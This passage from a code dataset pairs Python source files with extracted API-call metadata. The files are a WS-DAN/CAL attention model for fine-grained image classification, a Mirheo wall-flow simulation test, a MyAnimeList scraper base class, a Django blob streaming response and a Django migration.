39, 101, 50): 'num_actions'}, {}), '(num_actions)', False, 'from tensor2tensor.trax import layers\n'), ((101, 53, 101, 72), 'tensor2tensor.trax.layers.LogSoftmax', 'layers.LogSoftmax', ({}, {}), '()', False, 'from tensor2tensor.trax import layers\n'), ((723, 8, 723, 23), 'jax.numpy.sum', 'np.sum', ({(723, 15, 723, 22): 'traj[2]'}, {}), '(traj[2])', True, 'from jax import numpy as np\n'), ((880, 27, 880, 42), 'jax.numpy.sum', 'np.sum', ({(880, 34, 880, 41): 'traj[2]'}, {}), '(traj[2])', True, 'from jax import numpy as np\n')]
SudoRmFr/The-Nature-Conservancy-Fisheries-Monitoring
models/cal.py
059f0063c1493c19b4f45fa27d13adaeb6b2b2d7
""" WS-DAN models Hu et al., "See Better Before Looking Closer: Weakly Supervised Data Augmentation Network for Fine-Grained Visual Classification", arXiv:1901.09891 """ import logging import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import models.resnet as resnet from models.inception import inception_v3, BasicConv2d import models.coatnet as coatnet import random __all__ = ['WSDAN_CAL'] EPSILON = 1e-6 def weights_init_classifier(m): classname = m.__class__.__name__ if classname.find('Linear') != -1: nn.init.normal_(m.weight, std=0.001) if m.bias: nn.init.constant_(m.bias, 0.0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Linear') != -1: nn.init.kaiming_normal_(m.weight, a=0, mode='fan_out') nn.init.constant_(m.bias, 0.0) elif classname.find('Conv') != -1: nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in') if m.bias is not None: nn.init.constant_(m.bias, 0.0) elif classname.find('BatchNorm') != -1: if m.affine: nn.init.constant_(m.weight, 1.0) nn.init.constant_(m.bias, 0.0) # Bilinear Attention Pooling class BAP(nn.Module): def __init__(self, pool='GAP'): super(BAP, self).__init__() assert pool in ['GAP', 'GMP'] if pool == 'GAP': self.pool = None else: self.pool = nn.AdaptiveMaxPool2d(1) def forward(self, features, attentions): B, C, H, W = features.size() _, M, AH, AW = attentions.size() # match size if AH != H or AW != W: attentions = F.upsample_bilinear(attentions, size=(H, W)) # feature_matrix: (B, M, C) -> (B, M * C) if self.pool is None: feature_matrix = (torch.einsum('imjk,injk->imn', (attentions, features)) / float(H * W)).view(B, -1) else: feature_matrix = [] for i in range(M): AiF = self.pool(features * attentions[:, i:i + 1, ...]).view(B, -1) feature_matrix.append(AiF) feature_matrix = torch.cat(feature_matrix, dim=1) # sign-sqrt feature_matrix_raw = torch.sign(feature_matrix) * torch.sqrt(torch.abs(feature_matrix) + EPSILON) # l2 normalization along dimension M and C feature_matrix = F.normalize(feature_matrix_raw, dim=-1) if self.training: fake_att = torch.zeros_like(attentions).uniform_(0, 2) else: fake_att = torch.ones_like(attentions) counterfactual_feature = (torch.einsum('imjk,injk->imn', (fake_att, features)) / float(H * W)).view(B, -1) counterfactual_feature = torch.sign(counterfactual_feature) * torch.sqrt(torch.abs(counterfactual_feature) + EPSILON) counterfactual_feature = F.normalize(counterfactual_feature, dim=-1) return feature_matrix, counterfactual_feature def batch_augment(images, attention_map, mode='crop', theta=0.5, padding_ratio=0.1): batches, _, imgH, imgW = images.size() if mode == 'crop': crop_images = [] for batch_index in range(batches): atten_map = attention_map[batch_index:batch_index + 1] if isinstance(theta, tuple): theta_c = random.uniform(*theta) * atten_map.max() else: theta_c = theta * atten_map.max() crop_mask = F.upsample_bilinear(atten_map, size=(imgH, imgW)) >= theta_c nonzero_indices = torch.nonzero(crop_mask[0, 0, ...]) height_min = max(int(nonzero_indices[:, 0].min().item() - padding_ratio * imgH), 0) height_max = min(int(nonzero_indices[:, 0].max().item() + padding_ratio * imgH), imgH) width_min = max(int(nonzero_indices[:, 1].min().item() - padding_ratio * imgW), 0) width_max = min(int(nonzero_indices[:, 1].max().item() + padding_ratio * imgW), imgW) crop_images.append( F.upsample_bilinear(images[batch_index:batch_index + 1, :, height_min:height_max, width_min:width_max], size=(imgH, imgW))) crop_images = torch.cat(crop_images, dim=0) return crop_images elif 
mode == 'drop': drop_masks = [] for batch_index in range(batches): atten_map = attention_map[batch_index:batch_index + 1] if isinstance(theta, tuple): theta_d = random.uniform(*theta) * atten_map.max() else: theta_d = theta * atten_map.max() drop_masks.append(F.upsample_bilinear(atten_map, size=(imgH, imgW)) < theta_d) drop_masks = torch.cat(drop_masks, dim=0) drop_images = images * drop_masks.float() return drop_images else: raise ValueError('Expected mode in [\'crop\', \'drop\'], but received unsupported augmentation method %s' % mode) class WSDAN_CAL(nn.Module): def __init__(self, num_classes, M=32, net='inception_mixed_6e', pretrained=False): super(WSDAN_CAL, self).__init__() self.num_classes = num_classes self.M = M self.net = net # Network Initialization if 'inception' in net: if net == 'inception_mixed_6e': self.features = inception_v3(pretrained=pretrained).get_features_mixed_6e() self.num_features = 768 elif net == 'inception_mixed_7c': self.features = inception_v3(pretrained=pretrained).get_features_mixed_7c() self.num_features = 2048 else: raise ValueError('Unsupported net: %s' % net) elif 'resnet' in net: self.features = getattr(resnet, net)(pretrained=pretrained).get_features() self.num_features = 512 * self.features[-1][-1].expansion elif 'coat' in net: self.features = getattr(coatnet, net)().get_features() if '0' in net or '1' in net: self.num_features = 768 elif '2' in net: self.num_features = 1026 elif '3' in net or '4' in net: self.num_features = 1536 else: raise ValueError('Not given valid CoAtNet size.') else: raise ValueError('Unsupported net: %s' % net) # Attention Maps self.attentions = BasicConv2d(self.num_features, self.M, kernel_size=1) # Bilinear Attention Pooling self.bap = BAP(pool='GAP') # Classification Layer self.fc = nn.Linear(self.M * self.num_features, self.num_classes, bias=False) logging.info('WSDAN: using {} as feature extractor, num_classes: {}, num_attentions: {}'.format(net, self.num_classes, self.M)) def visualize(self, x): batch_size = x.size(0) # Feature Maps, Attention Maps and Feature Matrix feature_maps = self.features(x) if self.net != 'inception_mixed_7c': attention_maps = self.attentions(feature_maps) else: attention_maps = feature_maps[:, :self.M, ...] # print(feature_maps.shape) # print(attention_maps.shape) feature_matrix = self.bap(feature_maps, attention_maps)[0] p = self.fc(feature_matrix * 100.) return p, attention_maps def forward(self, x): batch_size = x.size(0) # Feature Maps, Attention Maps and Feature Matrix feature_maps = self.features(x) if self.net != 'inception_mixed_7c': attention_maps = self.attentions(feature_maps) else: attention_maps = feature_maps[:, :self.M, ...] feature_matrix, feature_matrix_hat = self.bap(feature_maps, attention_maps) # Classification p = self.fc(feature_matrix * 100.) 
# Generate Attention Map if self.training: # Randomly choose one of attention maps Ak attention_map = [] for i in range(batch_size): attention_weights = torch.sqrt(attention_maps[i].sum(dim=(1, 2)).detach() + EPSILON) attention_weights = F.normalize(attention_weights, p=1, dim=0) k_index = np.random.choice(self.M, 2, p=attention_weights.cpu().numpy()) attention_map.append(attention_maps[i, k_index, ...]) attention_map = torch.stack(attention_map) # (B, 2, H, W) - one for cropping, the other for dropping else: attention_map = torch.mean(attention_maps, dim=1, keepdim=True) # (B, 1, H, W) return p, p - self.fc(feature_matrix_hat * 100.), feature_matrix, attention_map def load_state_dict(self, state_dict, strict=True): model_dict = self.state_dict() pretrained_dict = {k: v for k, v in state_dict.items() if k in model_dict and model_dict[k].size() == v.size()} if len(pretrained_dict) == len(state_dict): print('%s: All params loaded' % type(self).__name__) else: print('%s: Some params were not loaded:' % type(self).__name__) not_loaded_keys = [k for k in state_dict.keys() if k not in pretrained_dict.keys()] print(('%s, ' * (len(not_loaded_keys) - 1) + '%s') % tuple(not_loaded_keys)) model_dict.update(pretrained_dict) super(WSDAN_CAL, self).load_state_dict(model_dict)
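The BAP module in cal.py above combines M attention maps with C feature maps through an einsum into a (B, M, C) matrix, then applies a signed square root and L2 normalisation. The shape walk-through below is an illustration only; the toy tensor sizes are arbitrary and nothing is taken from the repository beyond the operations themselves.

# Illustrative sketch only -- not part of cal.py above.
import torch
import torch.nn.functional as F

B, C, M, H, W = 2, 8, 4, 7, 7
features = torch.randn(B, C, H, W)    # backbone feature maps
attentions = torch.rand(B, M, H, W)   # attention maps

# Bilinear attention pooling: (B, M, H, W) x (B, C, H, W) -> (B, M, C)
feature_matrix = torch.einsum('imjk,injk->imn', attentions, features) / float(H * W)
print(feature_matrix.shape)           # torch.Size([2, 4, 8])

flat = feature_matrix.reshape(B, -1)  # flatten to (B, M * C)
flat = torch.sign(flat) * torch.sqrt(torch.abs(flat) + 1e-6)  # sign-sqrt
flat = F.normalize(flat, dim=-1)      # l2 normalisation along M * C
print(flat.shape)                     # torch.Size([2, 32])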
[((26, 8, 26, 44), 'torch.nn.init.normal_', 'nn.init.normal_', (), '', True, 'import torch.nn as nn\n'), ((33, 8, 33, 62), 'torch.nn.init.kaiming_normal_', 'nn.init.kaiming_normal_', (), '', True, 'import torch.nn as nn\n'), ((34, 8, 34, 38), 'torch.nn.init.constant_', 'nn.init.constant_', ({(34, 26, 34, 32): 'm.bias', (34, 34, 34, 37): '(0.0)'}, {}), '(m.bias, 0.0)', True, 'import torch.nn as nn\n'), ((76, 25, 76, 64), 'torch.nn.functional.normalize', 'F.normalize', (), '', True, 'import torch.nn.functional as F\n'), ((86, 33, 86, 76), 'torch.nn.functional.normalize', 'F.normalize', (), '', True, 'import torch.nn.functional as F\n'), ((111, 22, 111, 51), 'torch.cat', 'torch.cat', (), '', False, 'import torch\n'), ((165, 26, 165, 79), 'models.inception.BasicConv2d', 'BasicConv2d', (), '', False, 'from models.inception import inception_v3, BasicConv2d\n'), ((171, 18, 171, 85), 'torch.nn.Linear', 'nn.Linear', (), '', True, 'import torch.nn as nn\n'), ((28, 12, 28, 42), 'torch.nn.init.constant_', 'nn.init.constant_', ({(28, 30, 28, 36): 'm.bias', (28, 38, 28, 41): '(0.0)'}, {}), '(m.bias, 0.0)', True, 'import torch.nn as nn\n'), ((36, 8, 36, 61), 'torch.nn.init.kaiming_normal_', 'nn.init.kaiming_normal_', (), '', True, 'import torch.nn as nn\n'), ((52, 24, 52, 47), 'torch.nn.AdaptiveMaxPool2d', 'nn.AdaptiveMaxPool2d', ({(52, 45, 52, 46): '1'}, {}), '(1)', True, 'import torch.nn as nn\n'), ((60, 25, 60, 69), 'torch.nn.functional.upsample_bilinear', 'F.upsample_bilinear', (), '', True, 'import torch.nn.functional as F\n'), ((70, 29, 70, 61), 'torch.cat', 'torch.cat', (), '', False, 'import torch\n'), ((73, 29, 73, 55), 'torch.sign', 'torch.sign', ({(73, 40, 73, 54): 'feature_matrix'}, {}), '(feature_matrix)', False, 'import torch\n'), ((81, 23, 81, 50), 'torch.ones_like', 'torch.ones_like', ({(81, 39, 81, 49): 'attentions'}, {}), '(attentions)', False, 'import torch\n'), ((84, 33, 84, 67), 'torch.sign', 'torch.sign', ({(84, 44, 84, 66): 'counterfactual_feature'}, {}), '(counterfactual_feature)', False, 'import torch\n'), ((102, 30, 102, 65), 'torch.nonzero', 'torch.nonzero', ({(102, 44, 102, 64): 'crop_mask[0, 0, ...]'}, {}), '(crop_mask[0, 0, ...])', False, 'import torch\n'), ((124, 21, 124, 49), 'torch.cat', 'torch.cat', (), '', False, 'import torch\n'), ((217, 28, 217, 54), 'torch.stack', 'torch.stack', ({(217, 40, 217, 53): 'attention_map'}, {}), '(attention_map)', False, 'import torch\n'), ((219, 28, 219, 75), 'torch.mean', 'torch.mean', (), '', False, 'import torch\n'), ((38, 12, 38, 42), 'torch.nn.init.constant_', 'nn.init.constant_', ({(38, 30, 38, 36): 'm.bias', (38, 38, 38, 41): '(0.0)'}, {}), '(m.bias, 0.0)', True, 'import torch.nn as nn\n'), ((101, 24, 101, 73), 'torch.nn.functional.upsample_bilinear', 'F.upsample_bilinear', (), '', True, 'import torch.nn.functional as F\n'), ((109, 16, 110, 54), 'torch.nn.functional.upsample_bilinear', 'F.upsample_bilinear', (), '', True, 'import torch.nn.functional as F\n'), ((214, 36, 214, 78), 'torch.nn.functional.normalize', 'F.normalize', (), '', True, 'import torch.nn.functional as F\n'), ((41, 12, 41, 44), 'torch.nn.init.constant_', 'nn.init.constant_', ({(41, 30, 41, 38): 'm.weight', (41, 40, 41, 43): '(1.0)'}, {}), '(m.weight, 1.0)', True, 'import torch.nn as nn\n'), ((42, 12, 42, 42), 'torch.nn.init.constant_', 'nn.init.constant_', ({(42, 30, 42, 36): 'm.bias', (42, 38, 42, 41): '(0.0)'}, {}), '(m.bias, 0.0)', True, 'import torch.nn as nn\n'), ((73, 69, 73, 94), 'torch.abs', 'torch.abs', ({(73, 79, 73, 93): 'feature_matrix'}, {}), 
'(feature_matrix)', False, 'import torch\n'), ((79, 23, 79, 51), 'torch.zeros_like', 'torch.zeros_like', ({(79, 40, 79, 50): 'attentions'}, {}), '(attentions)', False, 'import torch\n'), ((82, 34, 82, 86), 'torch.einsum', 'torch.einsum', ({(82, 47, 82, 63): '"""imjk,injk->imn"""', (82, 65, 82, 85): '(fake_att, features)'}, {}), "('imjk,injk->imn', (fake_att, features))", False, 'import torch\n'), ((84, 81, 84, 114), 'torch.abs', 'torch.abs', ({(84, 91, 84, 113): 'counterfactual_feature'}, {}), '(counterfactual_feature)', False, 'import torch\n'), ((97, 26, 97, 48), 'random.uniform', 'random.uniform', ({(97, 41, 97, 47): '*theta'}, {}), '(*theta)', False, 'import random\n'), ((64, 30, 64, 84), 'torch.einsum', 'torch.einsum', ({(64, 43, 64, 59): '"""imjk,injk->imn"""', (64, 61, 64, 83): '(attentions, features)'}, {}), "('imjk,injk->imn', (attentions, features))", False, 'import torch\n'), ((119, 26, 119, 48), 'random.uniform', 'random.uniform', ({(119, 41, 119, 47): '*theta'}, {}), '(*theta)', False, 'import random\n'), ((123, 30, 123, 79), 'torch.nn.functional.upsample_bilinear', 'F.upsample_bilinear', (), '', True, 'import torch.nn.functional as F\n'), ((141, 32, 141, 67), 'models.inception.inception_v3', 'inception_v3', (), '', False, 'from models.inception import inception_v3, BasicConv2d\n'), ((144, 32, 144, 67), 'models.inception.inception_v3', 'inception_v3', (), '', False, 'from models.inception import inception_v3, BasicConv2d\n')]
noabauma/Mirheo
tests/walls/analytic/plates.py
bf7979bfbbf402d33c26ac5dc879f880e78e7017
#!/usr/bin/env python import mirheo as mir dt = 0.001 ranks = (1, 1, 1) domain = (8, 16, 8) force = (1.0, 0, 0) density = 4 u = mir.Mirheo(ranks, domain, dt, debug_level=3, log_filename='log', no_splash=True) pv = mir.ParticleVectors.ParticleVector('pv', mass = 1) ic = mir.InitialConditions.Uniform(number_density=density) u.registerParticleVector(pv=pv, ic=ic) dpd = mir.Interactions.Pairwise('dpd', rc=1.0, kind="DPD", a=10.0, gamma=50.0, kBT=1.0, power=0.5) u.registerInteraction(dpd) plate_lo = mir.Walls.Plane("plate_lo", (0, 0, -1), (0, 0, 1)) plate_hi = mir.Walls.Plane("plate_hi", (0, 0, 1), (0, 0, domain[2] - 1)) u.registerWall(plate_lo, 0) u.registerWall(plate_hi, 0) vv = mir.Integrators.VelocityVerlet("vv") frozen = u.makeFrozenWallParticles(pvName="plates", walls=[plate_lo, plate_hi], interactions=[dpd], integrator=vv, number_density=density) u.setWall(plate_lo, pv) u.setWall(plate_hi, pv) for p in (pv, frozen): u.setInteraction(dpd, p, pv) vv_dp = mir.Integrators.VelocityVerlet_withConstForce("vv_dp", force) u.registerIntegrator(vv_dp) u.setIntegrator(vv_dp, pv) sample_every = 2 dump_every = 1000 bin_size = (1., 1., 0.5) u.registerPlugins(mir.Plugins.createDumpAverage('field', [pv], sample_every, dump_every, bin_size, ["velocities"], 'h5/solvent-')) u.run(7002) # nTEST: walls.analytic.plates # cd walls/analytic # rm -rf h5 # mir.run --runargs "-n 2" ./plates.py # mir.avgh5 xy velocities h5/solvent-0000[4-7].h5 | awk '{print $1}' > profile.out.txt
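The nTEST block above reduces the dumped HDF5 averages to a single velocity profile with mir.avgh5 and awk. A rough Python equivalent is sketched below; it assumes, without checking, that each dump file stores the averaged field in a dataset named 'velocities' laid out as (z, y, x, component), so treat the dataset name and axis order purely as placeholders.

# Illustrative sketch only -- not part of plates.py above.
# Assumes each dump file has a dataset 'velocities' shaped (z, y, x, 3);
# both the name and the axis order are unverified placeholders.
import glob
import h5py
import numpy as np

profiles = []
for fname in sorted(glob.glob('h5/solvent-0000[4-7].h5')):
    with h5py.File(fname, 'r') as f:
        vel = f['velocities'][()]                         # (z, y, x, 3), assumed
        profiles.append(vel[..., 0].mean(axis=(1, 2)))    # x-velocity averaged over x and y

profile = np.mean(profiles, axis=0)                       # one value per z-bin
np.savetxt('profile.out.txt', profile)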
[((13, 4, 13, 84), 'mirheo.Mirheo', 'mir.Mirheo', (), '', True, 'import mirheo as mir\n'), ((15, 5, 15, 55), 'mirheo.ParticleVectors.ParticleVector', 'mir.ParticleVectors.ParticleVector', (), '', True, 'import mirheo as mir\n'), ((16, 5, 16, 58), 'mirheo.InitialConditions.Uniform', 'mir.InitialConditions.Uniform', (), '', True, 'import mirheo as mir\n'), ((19, 6, 19, 98), 'mirheo.Interactions.Pairwise', 'mir.Interactions.Pairwise', (), '', True, 'import mirheo as mir\n'), ((22, 11, 22, 74), 'mirheo.Walls.Plane', 'mir.Walls.Plane', ({(22, 27, 22, 37): '"""plate_lo"""', (22, 39, 22, 49): '(0, 0, -1)', (22, 51, 22, 73): '(0, 0, 1)'}, {}), "('plate_lo', (0, 0, -1), (0, 0, 1))", True, 'import mirheo as mir\n'), ((23, 11, 23, 74), 'mirheo.Walls.Plane', 'mir.Walls.Plane', ({(23, 27, 23, 37): '"""plate_hi"""', (23, 39, 23, 49): '(0, 0, 1)', (23, 51, 23, 73): '(0, 0, domain[2] - 1)'}, {}), "('plate_hi', (0, 0, 1), (0, 0, domain[2] - 1))", True, 'import mirheo as mir\n'), ((27, 5, 27, 41), 'mirheo.Integrators.VelocityVerlet', 'mir.Integrators.VelocityVerlet', ({(27, 36, 27, 40): '"""vv"""'}, {}), "('vv')", True, 'import mirheo as mir\n'), ((37, 8, 37, 69), 'mirheo.Integrators.VelocityVerlet_withConstForce', 'mir.Integrators.VelocityVerlet_withConstForce', ({(37, 54, 37, 61): '"""vv_dp"""', (37, 63, 37, 68): 'force'}, {}), "('vv_dp', force)", True, 'import mirheo as mir\n'), ((46, 18, 46, 129), 'mirheo.Plugins.createDumpAverage', 'mir.Plugins.createDumpAverage', ({(46, 48, 46, 55): '"""field"""', (46, 57, 46, 61): '[pv]', (46, 63, 46, 75): 'sample_every', (46, 77, 46, 87): 'dump_every', (46, 89, 46, 97): 'bin_size', (46, 99, 46, 113): "['velocities']", (46, 115, 46, 128): '"""h5/solvent-"""'}, {}), "('field', [pv], sample_every, dump_every,\n bin_size, ['velocities'], 'h5/solvent-')", True, 'import mirheo as mir\n')]
XueAlfred/MALAnalysis
scraper-code/myanimelist/base.py
630d578b30f7540769774e1e4ee072d9775bf4bf
#!/usr/bin/python # -*- coding: utf-8 -*- import abc import bs4 import functools import utilities class Error(Exception): """Base exception class that takes a message to display upon raising. """ def __init__(self, message=None): """Creates an instance of Error. :type message: str :param message: A message to display when raising the exception. """ super(Error, self).__init__() self.message = message def __str__(self): return unicode(self.message) if self.message is not None else u"" class MalformedPageError(Error): """Indicates that a page on MAL has broken markup in some way. """ def __init__(self, id, html, message=None): super(MalformedPageError, self).__init__(message=message) if isinstance(id, unicode): self.id = id else: self.id = str(id).decode(u'utf-8') if isinstance(html, unicode): self.html = html else: self.html = str(html).decode(u'utf-8') def __str__(self): return "\n".join([ super(MalformedPageError, self).__str__(), "ID: " + self.id, "HTML: " + self.html ]).encode(u'utf-8') class InvalidBaseError(Error): """Indicates that the particular resource instance requested does not exist on MAL. """ def __init__(self, id, message=None): super(InvalidBaseError, self).__init__(message=message) self.id = id def __str__(self): return "\n".join([ super(InvalidBaseError, self).__str__(), "ID: " + unicode(self.id) ]) def loadable(func_name): """Decorator for getters that require a load() upon first access. :type func_name: function :param func_name: class method that requires that load() be called if the class's _attribute value is None :rtype: function :return: the decorated class method. """ def inner(func): cached_name = '_' + func.__name__ @functools.wraps(func) def _decorator(self, *args, **kwargs): if getattr(self, cached_name) is None: getattr(self, func_name)() return func(self, *args, **kwargs) return _decorator return inner class Base(object): """Abstract base class for MAL resources. Provides autoloading, auto-setting functionality for other MAL objects. """ __metaclass__ = abc.ABCMeta """Attribute name for primary reference key to this object. When an attribute by the name given by _id_attribute is passed into set(), set() doesn't prepend an underscore for load()ing. """ _id_attribute = "id" def __repr__(self): return u"".join([ "<", self.__class__.__name__, " ", self._id_attribute, ": ", unicode(getattr(self, self._id_attribute)), ">" ]) def __hash__(self): return hash('-'.join([self.__class__.__name__, unicode(getattr(self, self._id_attribute))])) def __eq__(self, other): return isinstance(other, self.__class__) and getattr(self, self._id_attribute) == getattr(other, other._id_attribute) def __ne__(self, other): return not self.__eq__(other) def __init__(self, session): """Create an instance of Base. :type session: :class:`myanimelist.session.Session` :param session: A valid MAL session. """ self.session = session @abc.abstractmethod def load(self): """A callback to run before any @loadable attributes are returned. """ pass def set(self, attr_dict): """Sets attributes of this user object. :type attr_dict: dict :param attr_dict: Parameters to set, with attribute keys. :rtype: :class:`.Base` :return: The current object. """ for key in attr_dict: if key == self._id_attribute: setattr(self, self._id_attribute, attr_dict[key]) else: setattr(self, u"_" + key, attr_dict[key]) return self
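The loadable decorator above implements lazy loading: a getter returns its cached _<name> attribute and calls the named load method the first time that cache is still None. The subclass below shows the intended usage pattern; ExampleAnime, the _title attribute and the hard-coded title are inventions for this illustration, and the snippet assumes the Base class and loadable decorator above are in scope (under Python 2, since the module relies on unicode).

# Illustrative sketch only -- not part of base.py above.
class ExampleAnime(Base):
  _id_attribute = "id"

  def __init__(self, session, id):
    super(ExampleAnime, self).__init__(session)
    self.id = id
    self._title = None

  def load(self):
    # A real subclass would fetch and parse the MAL page here.
    self.set({u'title': u'Cowboy Bebop'})
    return self

  @loadable(u'load')
  def title(self):
    return self._title


anime = ExampleAnime(session=None, id=1)
print(anime.title())  # first access triggers load(); later accesses reuse the cached _title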
[((68, 5, 68, 26), 'functools.wraps', 'functools.wraps', ({(68, 21, 68, 25): 'func'}, {}), '(func)', False, 'import functools\n')]
BeryJu/p2
p2/core/http.py
80b5c6a821f90cef73d6e8cd3c6cdb05ffa86b27
"""p2 core http responses""" from wsgiref.util import FileWrapper from django.http import StreamingHttpResponse from p2.core.constants import ATTR_BLOB_MIME, ATTR_BLOB_SIZE_BYTES from p2.core.models import Blob class BlobResponse(StreamingHttpResponse): """Directly return blob's content. Optionally return as attachment if as_download is True""" def __init__(self, blob: Blob, chunk_size=8192): super().__init__(FileWrapper(blob, chunk_size)) self['Content-Length'] = blob.attributes.get(ATTR_BLOB_SIZE_BYTES, 0) self['Content-Type'] = blob.attributes.get(ATTR_BLOB_MIME, 'text/plain')
[((14, 25, 14, 54), 'wsgiref.util.FileWrapper', 'FileWrapper', ({(14, 37, 14, 41): 'blob', (14, 43, 14, 53): 'chunk_size'}, {}), '(blob, chunk_size)', False, 'from wsgiref.util import FileWrapper\n')]
callat-qcd/lattedb
lattedb/project/formfac/migrations/0009_auto_20200528_0907.py
75c06748f3d59332a84ec1b5794c215c5974a46f
# Generated by Django 3.0.6 on 2020-05-28 09:07 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('project_formfac', '0008_auto_20200408_0823'), ] operations = [ migrations.AlterField( model_name='concatenatedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='correlatormeta', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='diskconcatenatedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='diskcorrelatorh5dset', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='diskformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='diskspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='disktslicedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='disktslicedsaveragedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='disktslicedsaveragedspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='disktslicedspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='formfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. 
Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='spectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tapeconcatenatedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tapecorrelatorh5dset', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tapetslicedsaveragedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tapetslicedsaveragedspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tslicedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tslicedsaveragedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tslicedsaveragedspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tslicedspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), ]
[((11, 8, 11, 65), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', ({(11, 40, 11, 64): 'settings.AUTH_USER_MODEL'}, {}), '(settings.AUTH_USER_MODEL)', False, 'from django.db import migrations, models\n'), ((19, 18, 19, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((24, 18, 24, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((29, 18, 29, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((34, 18, 34, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((39, 18, 39, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((44, 18, 44, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((49, 18, 49, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((54, 18, 54, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((59, 18, 59, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((64, 18, 64, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((69, 18, 69, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((74, 18, 